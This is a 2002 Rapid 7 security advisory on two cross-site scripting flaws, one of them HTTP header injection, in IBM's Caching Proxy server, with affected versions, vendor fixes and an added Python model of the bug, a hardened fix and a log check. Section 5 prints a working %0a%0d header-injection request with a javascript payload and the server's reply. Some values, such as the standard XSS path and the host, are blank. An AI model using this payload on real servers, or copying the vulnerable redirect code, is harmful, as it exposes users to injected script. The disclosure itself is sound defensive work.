
IBM WebSphere Edge Server Caching Proxy XSS

                     Rapid 7, Inc. Security Advisory

        Visit to download NeXpose(tm), our
         advanced vulnerability scanner. Linux and Windows 2000
                       versions are available now!

Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

   Published:  October 23, 2002
   Revision:   1.0

   o First XSS issue (standard XSS)
      IBM:        APAR# IY24527

      CVE:        CAN-2002-1167

      Bugtraq:    6000

   o Second XSS issue (HTTP header injection)
      IBM:        APAR# IY35139

      CVE:        CAN-2002-1168

      Bugtraq:    6001

1. Affected system(s):

    o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
      with IBM WebSphere Edge Server v2.0)
    o IBM Web Traffic Express Caching Proxy Server v3.6

2. Summary

   IBM Web Traffic Express Caching Proxy server is vulnerable to
   cross-site scripting.  The Caching Proxy server allows script code
   to be injected into pages using standard cross-site scripting
   techniques.  A second, variant attack allows the HTTP headers to
   be manipulated.

   IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
   v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
   shipping products.  

3. Vendor status and information

   IBM Software

      IBM was notified of this issue and has released efix build number
      for Caching Proxy Server v4.x, which fixes this issue and other
      security issues (see Rapid 7 advisory R7-0007 for more
      information: ).
      IBM is tracking the first (standard) XSS issue as APAR# IY24527.
      IBM is tracking the second (header injection) XSS issue as
      APAR# IY35139.

4. Solution

   IBM customers should install Caching Proxy efix build or
   higher.  Efix builds can be downloaded from IBM's secure FTP site.
   For more information on obtaining efix builds, contact IBM support
   with the APAR numbers listed above.

   The fixes have also been ported back to the Web Traffic Express v3.6
   code base.  Customers running v3.6 should contact IBM support for
   more information on how to upgrade to a newer build.

5. Detailed analysis

   There are two XSS techniques that can be used against the caching
   proxy server.  Please note that the following text may be
   wrapped or otherwise mangled by mail clients or gateways.  You
   should refer to the original advisory if there is a question about
   the exact text.

   a) Standard XSS exploit against Web Traffic Express Caching Proxy

   Request the following path from the caching proxy server:


   b) XSS exploit against Web Traffic Express Caching Proxy, adding a
      second "Location:" header by using %0a%0d

   telnet 80
   Connected to
   Escape character is '^]'.
   GET /%0a%0dLocation:%20"><img%20src="javascript:alert(document.domain)"> HTTP/1.0

   HTTP/1.1 302 Found
   Server: IBM-PROXY-WTE-US/3.6
   Date: Fri, 18 Oct 2002 03:44:18 GMT
   Location: http:/<img src="javascript:alert(document.domain)">
   Accept-Ranges: bytes
   Content-Type: text/html
   Content-Length: 443
   Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT

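   As an added illustration (not part of the Rapid 7 advisory or of IBM's
   code), the following Python models the header-injection pattern shown in
   5(b): a redirect built from the URL-decoded request path lets a decoded
   %0a/%0d start a new header line, while the hardened variant refuses control
   characters and re-encodes the value; the last function is a log-side
   check.  The host proxy.example, the request path and the log lines are
   constructed for the example.

```python
import re
from urllib.parse import quote, unquote

CRLF = "\r\n"
ORIGIN = "http://proxy.example"  # constructed host for the example

# Constructed request path in the shape the advisory describes: an encoded
# LF/CR pair followed by a second "Location:" header (reserved target name).
INJECTED_PATH = "/%0a%0dLocation:%20http://example.invalid/"


def redirect_vulnerable(request_path: str) -> str:
    """Model of the unsafe behaviour: the path is URL-decoded and copied
    verbatim into the Location header, so decoded %0a/%0d become line
    breaks inside the response header block."""
    target = ORIGIN + unquote(request_path)
    return f"HTTP/1.1 302 Found{CRLF}Location: {target}{CRLF}{CRLF}"


def redirect_hardened(request_path: str) -> str:
    """Hardened variant (an added example, not IBM's efix): refuse any
    control character in the decoded value, then percent-encode it again
    before it is placed in a header, so no byte can end the line early."""
    decoded = unquote(request_path)
    if re.search(r"[\x00-\x1f\x7f]", decoded):
        raise ValueError("control character in redirect target")
    encoded = quote(decoded, safe="/:?=&")
    return f"HTTP/1.1 302 Found{CRLF}Location: {ORIGIN}{encoded}{CRLF}{CRLF}"


def header_names(response: str) -> list:
    """Split a raw response the way a lenient client does (CRLF, LFCR,
    bare CR or bare LF all end a line) and return header names in order."""
    names = []
    for line in re.split(r"\r\n|\n\r|\r|\n", response)[1:]:
        if line == "":
            break  # blank line ends the header block
        if ":" in line:
            names.append(line.split(":", 1)[0].strip())
    return names


ENCODED_CRLF = re.compile(r"%0[aAdD]")


def request_line_has_encoded_crlf(log_request_line: str) -> bool:
    """Log-side check: flag a request line whose path carries %0a or %0d."""
    parts = log_request_line.split(" ")
    return len(parts) >= 2 and ENCODED_CRLF.search(parts[1]) is not None


if __name__ == "__main__":
    print(header_names(redirect_vulnerable(INJECTED_PATH)))  # ['Location', 'Location']
    print(request_line_has_encoded_crlf("GET /index.html HTTP/1.0"))  # False
```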

6. Contact Information

   Rapid 7 Security Advisories
   Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.

